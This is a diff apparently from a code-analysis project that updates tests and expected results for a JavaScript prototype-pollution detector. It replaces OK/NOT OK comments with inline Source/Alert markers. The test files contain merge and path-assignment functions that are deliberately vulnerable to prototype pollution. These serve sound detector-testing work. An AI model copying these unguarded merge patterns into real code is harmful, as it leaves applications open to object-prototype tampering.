semmle.label | dst | +| tests.js:391:32:391:34 | dst | semmle.label | dst | +| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | +| tests.js:391:32:391:39 | dst[key] | semmle.label | dst[key] | +| tests.js:391:36:391:38 | key | semmle.label | key | +| tests.js:391:42:391:44 | src | semmle.label | src | +| tests.js:391:42:391:49 | src[key] | semmle.label | src[key] | +| tests.js:391:46:391:48 | key | semmle.label | key | +| tests.js:393:13:393:15 | dst | semmle.label | dst | +| tests.js:393:17:393:19 | key | semmle.label | key | +| tests.js:393:24:393:26 | src | semmle.label | src | +| tests.js:393:24:393:31 | src[key] | semmle.label | src[key] | +| tests.js:393:28:393:30 | key | semmle.label | key | +| tests.js:398:30:398:32 | dst | semmle.label | dst | +| tests.js:398:30:398:32 | dst | semmle.label | dst | +| tests.js:398:35:398:37 | src | semmle.label | src | +| tests.js:399:17:399:19 | src | semmle.label | src | +| tests.js:399:23:399:25 | key | semmle.label | key | +| tests.js:399:28:399:32 | value | semmle.label | value | +| tests.js:401:33:401:35 | dst | semmle.label | dst | +| tests.js:401:33:401:35 | dst | semmle.label | dst | +| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | +| tests.js:401:33:401:40 | dst[key] | semmle.label | dst[key] | +| tests.js:401:37:401:39 | key | semmle.label | key | +| tests.js:401:43:401:47 | value | semmle.label | value | +| tests.js:403:13:403:15 | dst | semmle.label | dst | +| tests.js:403:17:403:19 | key | semmle.label | key | +| tests.js:403:24:403:28 | value | semmle.label | value | +| tests.js:408:22:408:24 | obj | semmle.label | obj | +| tests.js:408:27:408:29 | key | semmle.label | key | +| tests.js:409:12:409:14 | obj | semmle.label | obj | +| tests.js:409:12:409:19 | obj[key] | semmle.label | obj[key] | +| tests.js:409:16:409:18 | key | semmle.label | key | +| tests.js:412:31:412:33 | dst | semmle.label | dst | +| tests.js:412:36:412:38 | src | semmle.label | src | +| tests.js:413:14:413:16 
| key | semmle.label | key | +| tests.js:414:13:414:41 | value | semmle.label | value | +| tests.js:414:21:414:41 | wrapped ... c, key) | semmle.label | wrapped ... c, key) | +| tests.js:414:33:414:35 | src | semmle.label | src | +| tests.js:414:38:414:40 | key | semmle.label | key | +| tests.js:415:13:415:42 | target | semmle.label | target | +| tests.js:415:22:415:42 | wrapped ... t, key) | semmle.label | wrapped ... t, key) | +| tests.js:415:34:415:36 | dst | semmle.label | dst | +| tests.js:415:39:415:41 | key | semmle.label | key | +| tests.js:417:34:417:39 | target | semmle.label | target | +| tests.js:417:42:417:46 | value | semmle.label | value | +| tests.js:419:13:419:15 | dst | semmle.label | dst | +| tests.js:419:17:419:19 | key | semmle.label | key | +| tests.js:419:24:419:28 | value | semmle.label | value | +| tests.js:424:25:424:27 | obj | semmle.label | obj | +| tests.js:424:30:424:32 | key | semmle.label | key | +| tests.js:426:12:426:14 | obj | semmle.label | obj | +| tests.js:426:12:426:19 | obj[key] | semmle.label | obj[key] | +| tests.js:426:16:426:18 | key | semmle.label | key | +| tests.js:429:34:429:36 | dst | semmle.label | dst | +| tests.js:429:39:429:41 | src | semmle.label | src | +| tests.js:430:14:430:16 | key | semmle.label | key | +| tests.js:431:13:431:44 | value | semmle.label | value | +| tests.js:431:21:431:44 | almostS ... c, key) | semmle.label | almostS ... c, key) | +| tests.js:431:36:431:38 | src | semmle.label | src | +| tests.js:431:41:431:43 | key | semmle.label | key | +| tests.js:432:13:432:45 | target | semmle.label | target | +| tests.js:432:22:432:45 | almostS ... t, key) | semmle.label | almostS ... 
t, key) | +| tests.js:432:37:432:39 | dst | semmle.label | dst | +| tests.js:432:42:432:44 | key | semmle.label | key | +| tests.js:434:37:434:42 | target | semmle.label | target | +| tests.js:434:45:434:49 | value | semmle.label | value | +| tests.js:436:13:436:15 | dst | semmle.label | dst | +| tests.js:436:17:436:19 | key | semmle.label | key | +| tests.js:436:24:436:28 | value | semmle.label | value | +| tests.js:441:19:441:21 | obj | semmle.label | obj | +| tests.js:443:12:443:14 | obj | semmle.label | obj | +| tests.js:443:12:443:19 | obj[key] | semmle.label | obj[key] | +| tests.js:446:33:446:35 | src | semmle.label | src | +| tests.js:447:14:447:16 | key | semmle.label | key | +| tests.js:448:13:448:38 | value | semmle.label | value | +| tests.js:448:21:448:38 | safeRead(src, key) | semmle.label | safeRead(src, key) | +| tests.js:448:30:448:32 | src | semmle.label | src | +| tests.js:451:39:451:43 | value | semmle.label | value | +| tests.js:453:17:453:19 | key | semmle.label | key | +| tests.js:453:24:453:28 | value | semmle.label | value | +| tests.js:458:26:458:28 | dst | semmle.label | dst | +| tests.js:458:31:458:33 | src | semmle.label | src | +| tests.js:460:12:460:14 | src | semmle.label | src | +| tests.js:460:18:460:22 | value | semmle.label | value | +| tests.js:460:25:460:27 | key | semmle.label | key | +| tests.js:462:29:462:31 | dst | semmle.label | dst | +| tests.js:462:29:462:36 | dst[key] | semmle.label | dst[key] | +| tests.js:462:33:462:35 | key | semmle.label | key | +| tests.js:462:39:462:41 | src | semmle.label | src | +| tests.js:462:39:462:46 | src[key] | semmle.label | src[key] | +| tests.js:462:43:462:45 | key | semmle.label | key | +| tests.js:465:30:465:32 | dst | semmle.label | dst | +| tests.js:465:34:465:36 | key | semmle.label | key | +| tests.js:465:41:465:43 | src | semmle.label | src | +| tests.js:465:41:465:48 | src[key] | semmle.label | src[key] | +| tests.js:465:45:465:47 | key | semmle.label | key | +| 
tests.js:466:30:466:32 | dst | semmle.label | dst | +| tests.js:466:34:466:36 | key | semmle.label | key | +| tests.js:466:41:466:46 | o[key] | semmle.label | o[key] | +| tests.js:466:43:466:45 | key | semmle.label | key | +| tests.js:467:30:467:32 | dst | semmle.label | dst | +| tests.js:467:34:467:36 | key | semmle.label | key | +| tests.js:467:41:467:45 | value | semmle.label | value | +| tests.js:472:38:472:40 | dst | semmle.label | dst | +| tests.js:473:18:473:22 | value | semmle.label | value | +| tests.js:473:25:473:27 | key | semmle.label | key | +| tests.js:475:41:475:43 | dst | semmle.label | dst | +| tests.js:475:41:475:48 | dst[key] | semmle.label | dst[key] | +| tests.js:475:45:475:47 | key | semmle.label | key | +| tests.js:477:13:477:15 | dst | semmle.label | dst | +| tests.js:477:17:477:19 | key | semmle.label | key | +| tests.js:477:24:477:28 | value | semmle.label | value | +| tests.js:483:26:483:28 | dst | semmle.label | dst | +| tests.js:483:31:483:33 | src | semmle.label | src | +| tests.js:483:31:483:33 | src | semmle.label | src | +| tests.js:484:14:484:16 | key | semmle.label | key | +| tests.js:487:29:487:31 | dst | semmle.label | dst | +| tests.js:487:29:487:36 | dst[key] | semmle.label | dst[key] | +| tests.js:487:33:487:35 | key | semmle.label | key | +| tests.js:487:39:487:41 | src | semmle.label | src | +| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | +| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | +| tests.js:487:39:487:46 | src[key] | semmle.label | src[key] | +| tests.js:487:43:487:45 | key | semmle.label | key | +| tests.js:489:13:489:15 | dst | semmle.label | dst | +| tests.js:489:17:489:19 | key | semmle.label | key | +| tests.js:489:24:489:26 | src | semmle.label | src | +| tests.js:489:24:489:31 | src[key] | semmle.label | src[key] | +| tests.js:489:28:489:30 | key | semmle.label | key | +| tests.js:494:32:494:34 | src | semmle.label | src | +| tests.js:495:14:495:16 | key | semmle.label | key | 
+| tests.js:498:13:498:28 | value | semmle.label | value | +| tests.js:498:13:498:28 | value | semmle.label | value | +| tests.js:498:13:498:28 | value | semmle.label | value | +| tests.js:498:21:498:23 | src | semmle.label | src | +| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | +| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | +| tests.js:498:21:498:28 | src[key] | semmle.label | src[key] | +| tests.js:498:25:498:27 | key | semmle.label | key | +| tests.js:500:38:500:42 | value | semmle.label | value | +| tests.js:502:17:502:19 | key | semmle.label | key | +| tests.js:502:24:502:28 | value | semmle.label | value | +| tests.js:508:30:508:32 | dst | semmle.label | dst | +| tests.js:508:35:508:37 | src | semmle.label | src | +| tests.js:511:13:511:25 | key | semmle.label | key | +| tests.js:511:19:511:25 | keys[i] | semmle.label | keys[i] | +| tests.js:513:33:513:35 | dst | semmle.label | dst | +| tests.js:513:33:513:40 | dst[key] | semmle.label | dst[key] | +| tests.js:513:37:513:39 | key | semmle.label | key | +| tests.js:513:43:513:45 | src | semmle.label | src | +| tests.js:513:43:513:50 | src[key] | semmle.label | src[key] | +| tests.js:513:47:513:49 | key | semmle.label | key | +| tests.js:516:32:516:34 | src | semmle.label | src | +| tests.js:516:32:516:39 | src[key] | semmle.label | src[key] | +| tests.js:516:36:516:38 | key | semmle.label | key | +| tests.js:517:35:517:37 | dst | semmle.label | dst | +| tests.js:517:40:517:42 | key | semmle.label | key | +| tests.js:522:35:522:38 | args [0] | semmle.label | args [0] | +| tests.js:522:35:522:38 | args [1] | semmle.label | args [1] | +| tests.js:523:11:523:23 | dst | semmle.label | dst | +| tests.js:523:17:523:20 | args [0] | semmle.label | args [0] | +| tests.js:523:17:523:23 | args[0] | semmle.label | args[0] | +| tests.js:524:11:524:23 | src | semmle.label | src | +| tests.js:524:17:524:20 | args [1] | semmle.label | args [1] | +| tests.js:524:17:524:23 | args[1] | 
semmle.label | args[1] | +| tests.js:525:14:525:16 | key | semmle.label | key | +| tests.js:527:35:527:37 | dst | semmle.label | dst | +| tests.js:527:35:527:42 | dst[key] | semmle.label | dst[key] | +| tests.js:527:39:527:41 | key | semmle.label | key | +| tests.js:527:45:527:47 | src | semmle.label | src | +| tests.js:527:45:527:52 | src[key] | semmle.label | src[key] | +| tests.js:527:49:527:51 | key | semmle.label | key | +| tests.js:529:13:529:15 | dst | semmle.label | dst | +| tests.js:529:17:529:19 | key | semmle.label | key | +| tests.js:529:24:529:26 | src | semmle.label | src | +| tests.js:529:24:529:31 | src[key] | semmle.label | src[key] | +| tests.js:529:28:529:30 | key | semmle.label | key | +| tests.js:534:31:534:33 | obj | semmle.label | obj | +| tests.js:534:36:534:43 | callback [dst] | semmle.label | callback [dst] | +| tests.js:538:9:538:16 | callback [dst] | semmle.label | callback [dst] | +| tests.js:538:18:538:24 | keys[i] | semmle.label | keys[i] | +| tests.js:538:27:538:29 | obj | semmle.label | obj | +| tests.js:538:27:538:38 | obj[keys[i]] | semmle.label | obj[keys[i]] | +| tests.js:538:31:538:37 | keys[i] | semmle.label | keys[i] | +| tests.js:542:30:542:32 | dst | semmle.label | dst | +| tests.js:542:35:542:37 | src | semmle.label | src | +| tests.js:543:26:543:28 | src | semmle.label | src | +| tests.js:543:32:543:34 | key | semmle.label | key | +| tests.js:543:37:543:41 | value | semmle.label | value | +| tests.js:545:33:545:35 | dst | semmle.label | dst | +| tests.js:545:33:545:40 | dst[key] | semmle.label | dst[key] | +| tests.js:545:37:545:39 | key | semmle.label | key | +| tests.js:545:43:545:47 | value | semmle.label | value | +| tests.js:547:13:547:15 | dst | semmle.label | dst | +| tests.js:547:17:547:19 | key | semmle.label | key | +| tests.js:547:24:547:28 | value | semmle.label | value | +| tests.js:552:35:552:37 | src | semmle.label | src | +| tests.js:553:14:553:16 | key | semmle.label | key | +| tests.js:557:43:557:45 | 
src | semmle.label | src | +| tests.js:557:43:557:50 | src[key] | semmle.label | src[key] | +| tests.js:559:17:559:19 | key | semmle.label | key | +| tests.js:559:24:559:26 | src | semmle.label | src | +| tests.js:559:24:559:31 | src[key] | semmle.label | src[key] | +| tests.js:559:28:559:30 | key | semmle.label | key | +| tests.js:564:35:564:37 | src | semmle.label | src | +| tests.js:565:14:565:16 | key | semmle.label | key | +| tests.js:569:43:569:45 | src | semmle.label | src | +| tests.js:569:43:569:50 | src[key] | semmle.label | src[key] | +| tests.js:571:17:571:19 | key | semmle.label | key | +| tests.js:571:24:571:26 | src | semmle.label | src | +| tests.js:571:24:571:31 | src[key] | semmle.label | src[key] | +| tests.js:571:28:571:30 | key | semmle.label | key | +| tests.js:576:30:576:32 | src | semmle.label | src | +| tests.js:577:14:577:16 | key | semmle.label | key | +| tests.js:580:38:580:40 | src | semmle.label | src | +| tests.js:580:38:580:45 | src[key] | semmle.label | src[key] | +| tests.js:582:17:582:19 | key | semmle.label | key | +| tests.js:582:24:582:26 | src | semmle.label | src | +| tests.js:582:24:582:31 | src[key] | semmle.label | src[key] | +| tests.js:582:28:582:30 | key | semmle.label | key | +| tests.js:591:25:591:27 | obj | semmle.label | obj | +| tests.js:592:7:592:9 | obj | semmle.label | obj | +| tests.js:592:21:592:23 | obj | semmle.label | obj | +| tests.js:593:10:593:12 | obj | semmle.label | obj | +| tests.js:600:31:600:34 | dest | semmle.label | dest | +| tests.js:600:37:600:42 | source | semmle.label | source | +| tests.js:601:16:601:18 | key | semmle.label | key | +| tests.js:603:34:603:37 | dest | semmle.label | dest | +| tests.js:603:34:603:42 | dest[key] | semmle.label | dest[key] | +| tests.js:603:39:603:41 | key | semmle.label | key | +| tests.js:603:45:603:50 | source | semmle.label | source | +| tests.js:603:45:603:55 | source[key] | semmle.label | source[key] | +| tests.js:603:52:603:54 | key | semmle.label | key | 
+| tests.js:605:13:605:16 | dest | semmle.label | dest | +| tests.js:605:18:605:20 | key | semmle.label | key | +| tests.js:605:25:605:51 | capture ... e[key]) | semmle.label | capture ... e[key]) | +| tests.js:605:40:605:45 | source | semmle.label | source | +| tests.js:605:40:605:50 | source[key] | semmle.label | source[key] | +| tests.js:605:47:605:49 | key | semmle.label | key | subpaths | tests.js:355:53:355:63 | target[key] | tests.js:348:32:348:37 | target | tests.js:361:12:361:17 | target | tests.js:355:31:355:86 | mergePl ... ptions) | | tests.js:371:62:371:72 | target[key] | tests.js:364:41:364:46 | target | tests.js:377:12:377:17 | target | tests.js:371:31:371:95 | mergePl ... ptions) | 
@@ -1381,36 +1414,3 @@ subpaths | tests.js:432:42:432:44 | key | tests.js:424:30:424:32 | key | tests.js:426:12:426:19 | obj[key] | tests.js:432:22:432:45 | almostS ... t, key) | | tests.js:448:30:448:32 | src | tests.js:441:19:441:21 | obj | tests.js:443:12:443:19 | obj[key] | tests.js:448:21:448:38 | safeRead(src, key) | | tests.js:605:40:605:50 | source[key] | tests.js:591:25:591:27 | obj | tests.js:593:10:593:12 | obj | tests.js:605:25:605:51 | capture ... e[key]) | -#select -| examples/PrototypePollutingFunction.js:7:13:7:15 | dst | examples/PrototypePollutingFunction.js:2:14:2:16 | key | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | examples/PrototypePollutingFunction.js:2:21:2:23 | src | src | examples/PrototypePollutingFunction.js:7:13:7:15 | dst | dst | -| path-assignment.js:15:13:15:18 | target | path-assignment.js:8:19:8:25 | keys[i] | path-assignment.js:15:13:15:18 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:8:19:8:25 | keys[i] | here | path-assignment.js:15:13:15:18 | target | target | -| path-assignment.js:44:5:44:10 | target | path-assignment.js:41:19:41:25 | keys[i] | path-assignment.js:44:5:44:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:41:19:41:25 | keys[i] | here | path-assignment.js:44:5:44:10 | target | target | -| path-assignment.js:61:5:61:10 | target | path-assignment.js:58:19:58:25 | keys[i] | path-assignment.js:61:5:61:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. 
| path-assignment.js:58:19:58:25 | keys[i] | here | path-assignment.js:61:5:61:10 | target | target | -| path-assignment.js:71:5:71:10 | target | path-assignment.js:68:19:68:25 | keys[i] | path-assignment.js:71:5:71:10 | target | The property chain $@ is recursively assigned to $@ without guarding against prototype pollution. | path-assignment.js:68:19:68:25 | keys[i] | here | path-assignment.js:71:5:71:10 | target | target | -| tests.js:8:13:8:15 | dst | tests.js:4:14:4:16 | key | tests.js:8:13:8:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:4:21:4:23 | src | src | tests.js:8:13:8:15 | dst | dst | -| tests.js:18:13:18:15 | dst | tests.js:14:30:14:32 | key | tests.js:18:13:18:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:14:17:14:19 | src | src | tests.js:18:13:18:15 | dst | dst | -| tests.js:36:9:36:11 | dst | tests.js:25:18:25:20 | key | tests.js:36:9:36:11 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:25:25:25:30 | source | source | tests.js:36:9:36:11 | dst | dst | -| tests.js:46:13:46:15 | dst | tests.js:41:14:41:16 | key | tests.js:46:13:46:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:41:21:41:23 | src | src | tests.js:46:13:46:15 | dst | dst | -| tests.js:57:13:57:15 | dst | tests.js:52:14:52:16 | key | tests.js:57:13:57:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:52:21:52:23 | src | src | tests.js:57:13:57:15 | dst | dst | -| tests.js:109:13:109:15 | dst | tests.js:102:14:102:16 | key | tests.js:109:13:109:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. 
| tests.js:102:21:102:23 | src | src | tests.js:109:13:109:15 | dst | dst | -| tests.js:154:13:154:15 | dst | tests.js:150:14:150:16 | key | tests.js:154:13:154:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:150:21:150:23 | src | src | tests.js:154:13:154:15 | dst | dst | -| tests.js:196:13:196:15 | dst | tests.js:192:19:192:25 | keys[i] | tests.js:196:13:196:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:190:28:190:30 | src | src | tests.js:196:13:196:15 | dst | dst | -| tests.js:233:5:233:13 | map[key1] | tests.js:238:14:238:16 | key | tests.js:233:5:233:13 | map[key1] | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:238:21:238:24 | data | data | tests.js:233:5:233:13 | map[key1] | here | -| tests.js:270:13:270:15 | dst | tests.js:265:19:265:26 | entry[0] | tests.js:270:13:270:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:264:20:264:22 | src | src | tests.js:270:13:270:15 | dst | dst | -| tests.js:280:13:280:15 | dst | tests.js:276:34:276:36 | key | tests.js:280:13:280:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:276:21:276:23 | src | src | tests.js:280:13:280:15 | dst | dst | -| tests.js:308:17:308:19 | dst | tests.js:302:14:302:16 | key | tests.js:308:17:308:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:302:21:302:23 | src | src | tests.js:308:17:308:19 | dst | dst | -| tests.js:322:17:322:19 | dst | tests.js:315:14:315:16 | key | tests.js:322:17:322:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. 
| tests.js:315:21:315:23 | src | src | tests.js:322:17:322:19 | dst | dst | -| tests.js:338:17:338:19 | dst | tests.js:329:14:329:16 | key | tests.js:338:17:338:19 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:329:21:329:23 | src | src | tests.js:338:17:338:19 | dst | dst | -| tests.js:357:17:357:22 | target | tests.js:350:37:350:39 | key | tests.js:357:17:357:22 | target | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:350:21:350:26 | source | source | tests.js:357:17:357:22 | target | target | -| tests.js:403:13:403:15 | dst | tests.js:381:14:381:16 | key | tests.js:403:13:403:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:381:21:381:23 | obj | obj | tests.js:403:13:403:15 | dst | dst | -| tests.js:419:13:419:15 | dst | tests.js:413:14:413:16 | key | tests.js:419:13:419:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:413:21:413:23 | src | src | tests.js:419:13:419:15 | dst | dst | -| tests.js:436:13:436:15 | dst | tests.js:430:14:430:16 | key | tests.js:436:13:436:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:430:21:430:23 | src | src | tests.js:436:13:436:15 | dst | dst | -| tests.js:465:30:465:32 | dst | tests.js:460:25:460:27 | key | tests.js:465:30:465:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:465:30:465:32 | dst | dst | -| tests.js:466:30:466:32 | dst | tests.js:460:25:460:27 | key | tests.js:466:30:466:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. 
| tests.js:460:12:460:14 | src | src | tests.js:466:30:466:32 | dst | dst | -| tests.js:467:30:467:32 | dst | tests.js:460:25:460:27 | key | tests.js:467:30:467:32 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:460:12:460:14 | src | src | tests.js:467:30:467:32 | dst | dst | -| tests.js:477:13:477:15 | dst | tests.js:473:25:473:27 | key | tests.js:477:13:477:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:473:12:473:14 | src | src | tests.js:477:13:477:15 | dst | dst | -| tests.js:489:13:489:15 | dst | tests.js:484:14:484:16 | key | tests.js:489:13:489:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:484:21:484:23 | src | src | tests.js:489:13:489:15 | dst | dst | -| tests.js:517:35:517:37 | dst | tests.js:511:19:511:25 | keys[i] | tests.js:517:35:517:37 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:509:28:509:30 | src | src | tests.js:517:35:517:37 | dst | dst | -| tests.js:529:13:529:15 | dst | tests.js:525:14:525:16 | key | tests.js:529:13:529:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:525:21:525:23 | src | src | tests.js:529:13:529:15 | dst | dst | -| tests.js:547:13:547:15 | dst | tests.js:538:18:538:24 | keys[i] | tests.js:547:13:547:15 | dst | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:535:30:535:32 | obj | obj | tests.js:547:13:547:15 | dst | dst | -| tests.js:605:13:605:16 | dest | tests.js:601:16:601:18 | key | tests.js:605:13:605:16 | dest | Properties are copied from $@ to $@ without guarding against prototype pollution. | tests.js:601:35:601:40 | source | source | tests.js:605:13:605:16 | dest | dest | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref
index 972db5adb99d..ec5ea34d9eb1 100644
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref
+++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/PrototypePollutingFunction.qlref
@@ -1 +1,2 @@
-Security/CWE-915/PrototypePollutingFunction.ql
\ No newline at end of file
+query: Security/CWE-915/PrototypePollutingFunction.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js
index 1953ba57f00b..ef5ba9691fec 100644
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js
+++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js
@@ -1,10 +1,10 @@
 function merge(dst, src) {
- for (let key in src) {
+ for (let key in src) { // $ Source
 if (!src.hasOwnProperty(key)) continue;
 if (isObject(dst[key])) {
 merge(dst[key], src[key]);
 } else {
- dst[key] = src[key];
+ dst[key] = src[key]; // $ Alert
 }
 }
 }
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js
index c7285a3ac1bd..14d7a4e65196 100644
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js
+++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/path-assignment.js
@@ -5,14 +5,14 @@ function isSafe(key) { function assignToPath(target, path, value) { let keys = path.split('.'); for (let i = 0; i < keys.length; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source if (i < keys.length - 1) { if (!target[key]) { target[key] = {}; } target = target[key]; } else { - target[key] = value; // NOT OK + target[key] = value; // $ Alert } } } @@ -28,7 +28,7 @@ function assignToPathSafe(target, path, value) { } target = target[key]; } else { - target[key] = value; // OK + target[key] = value; } } } @@ -38,10 +38,10 @@ function assignToPathAfterLoop(target, path, value) { let keys = path.split('.'); let i; for (i = 0; i < keys.length - 1; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function splitHelper(path, sep) { @@ -55,18 +55,18 @@ function assignToPathWithHelper(target, path, value, sep) { let keys = splitHelper(path, sep) let i; for (i = 0; i < keys.length - 1; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } function spltOnRegexp(target, path, value) { let keys = path.split(/\./); let i; for (i = 0; i < keys.length - 1; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source target = target[key] = target[key] || {}; } - target[keys[i]] = value; // NOT OK + target[keys[i]] = value; // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js index 14a0a19fb626..dcce195526ac 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/tests.js 
@@ -1,28 +1,28 @@ import dummy from 'somewhere'; function copyUsingForIn(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (dst[key]) { copyUsingForIn(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } function copyUsingKeys(dst, src) { - Object.keys(src).forEach(key => { + Object.keys(src).forEach(key => { // $ Source if (dst[key]) { copyUsingKeys(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } function copyRest(dst, ...sources) { for (let source of sources) { - for (let key in source) { + for (let key in source) { // $ Source copyRestAux(dst, source[key], key); } } @@ -33,28 +33,28 @@ function copyRestAux(dst, value, key) { if (dstValue) { copyRest(dstValue, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } function copyProtoGuarded(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (key === "__proto__") continue; if (dst[key]) { copyProtoGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } function copyCtorGuarded(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (key === "constructor") continue; if (dst[key]) { copyCtorGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -65,7 +65,7 @@ function copyDoubleGuarded(dst, src) { if (dst[key]) { copyDoubleGuarded(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -80,7 +80,7 @@ function copyComplex(dst, src) { if (dst[key]) { copyComplex(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } 
@@ -93,20 +93,20 @@ function copyHasOwnProperty(dst, src) { if (dst.hasOwnProperty(key)) { copyHasOwnProperty(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function copyHasOwnPropertyBad(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source // Guarding using src.hasOwnProperty is *not* effective, // since '__proto__' and 'constructor' are own properties in the payload. if (!src.hasOwnProperty(key)) continue; // Not safe if (dst[key]) { copyHasOwnPropertyBad(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -118,21 +118,21 @@ function copyHasOwnPropertyTearOff(dst, src) { if (_hasOwnProp.call(dst, key)) { copyHasOwnPropertyTearOff(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } function shallowExtend(dst, src) { for (let key in src) { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } function transform(src, fn) { if (typeof src !== 'object') return fn(src); for (let key in src) { - src[key] = transform(src[key], fn); // OK + src[key] = transform(src[key], fn); } return src; } @@ -141,17 +141,17 @@ function clone(src) { if (typeof src !== 'object') return src; let result = {}; for (let key in src) { - result[key] = clone(src[key]); // OK + result[key] = clone(src[key]); } return result; } function higherOrderRecursion(dst, src, callback) { - for (let key in src) { + for (let key in src) { // $ Source if (dst[key]) { callback(dst, src, key); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -168,7 +168,7 @@ function instanceofObjectGuard(dst, src) { if (typeof dstValue === 'object' && dstValue instanceof Object) { instanceofObjectGuard(dstValue, src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } 
